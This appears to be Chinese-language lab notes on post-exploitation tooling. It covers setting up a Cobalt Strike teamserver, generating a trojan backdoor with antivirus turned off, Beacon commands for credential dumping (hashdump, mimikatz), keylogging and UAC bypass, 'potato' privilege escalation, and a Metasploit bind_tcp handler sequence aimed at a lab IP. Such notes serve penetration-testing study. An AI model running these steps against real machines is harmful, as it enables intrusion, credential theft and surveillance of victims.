文章目录
一、CS安装(先安好Java环境)
1.1 server端
把CS全部文件下上传到kali上,并给足权限chmod +x 文件名
在服务端运行起来./teamserver IP 密码
本地电脑使用客户端连接即可
主要输入HOST、Port、password即可(检查好地址和密码是否与上面的一致)
成功登录进来
1.2 client端
设置监听器
一定要设置好Host!
可以看到成功设置监听器
生成木马后门
成功在桌面生成一个木马(记得关闭杀毒软件!不然会被清理掉)
运行即可上线CS
二、用户组和用户、windows信息搜集命令
以下是Windows用户组和用户信息收集的一些常用命令:
whoami 显示当前用户的用户名
whoami /groups 显示当前用户所属的所有组
net user 列出本地计算机上的所有用户账户
net user <username> 查看指定用户的详细信息
net localgroup 列出本地计算机上的所有用户组
net localgroup <groupname> 查看指定用户组的所有成员
wmic useraccount get name,sid 列出所有用户及其对应的SID
whoami /priv 显示当前用户的权限列表
net localgroup <groupname> /domain 查看域中指定用户组的权限
systeminfo 显示计算机详细配置信息
query user 列出当前登录的用户会话
browserpivot 注入受害者浏览器进程
sleep 3 全部命令3秒执行
bypassuac 绕过UAC
cancel 取消正在进行的下载
checkin 强制让被控端回连一次
clear 清除beacon内部的任务队列
connect 连接到Beacon peer通过TCP
covertvpn 部署Covert VPN客户端
cp 复制文件
elevate 尝试提权
execute 在目标上执行程序(无输出)
execute-assembly 在目标上内存中执行本地.NET程序
exit 退出beacon
getprivs 启用当前令牌的系统权限
getsystem 尝试获取SYSTEM权限
getuid 获取用户ID
hashdump 转储密码哈希值
help 帮助
inject 在特定进程中生成会话
jobkill 杀死一个后台任务
jobs 列出后台任务
kerberos_ccache_use 从ccache文件中导入票据应用于此会话
kerberos_ticket_purge 清除当前会话的票据
kerberos_ticket_use 从ticket文件中导入票据应用于此会话
keylogger 键盘记录
kill 结束进程
link 通过命名管道连接到Beacon peer
logonpasswords 使用mimikatz转储凭据和哈希值
ls 列出文件
make_token 创建令牌以传递凭据
mimikatz 运行mimikatz
mkdir 创建一个目录
mv 移动文件
net net命令
note 备注
portscan 进行端口扫描
pwd 当前目录位置
reg 查询注册表
rev2self 恢复原始令牌
rm 删除文件或文件夹
rportfwd 端口转发
run 在目标上执行程序(返回输出)
runas 以另一个用户权限执行程序
runasadmin 在高权限下执行程序
三、总结手工提权思路,拿土豆提权
3.1 手工提权思路
3.2 土豆提权
安装cs插件
使用土豆插件提权
配置好listener
土豆提权(这里没有成功,换到win7系统成功)
四、用CS插件提权
前面步骤与土豆提权相同,直接看结果
五、MSF提权
在kali中生成正向木马
将生成的木马拖到目标机的文件夹
msfconsole # 在命令行里面输入命令,进入msf漏洞利用框架;
use exploit/multi/handler # 使用这个模块连接远程木马;
set payload windows/x64/meterpreter/bind_tcp # 设置正向连接payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;
set rhost 192.168.100.150 # 目标主机ip
set lport 6666 # 我们的kali本机端口
exploit
输入shell,可以进入相应的文件夹里,输入ipconfig可以查相应的ip地址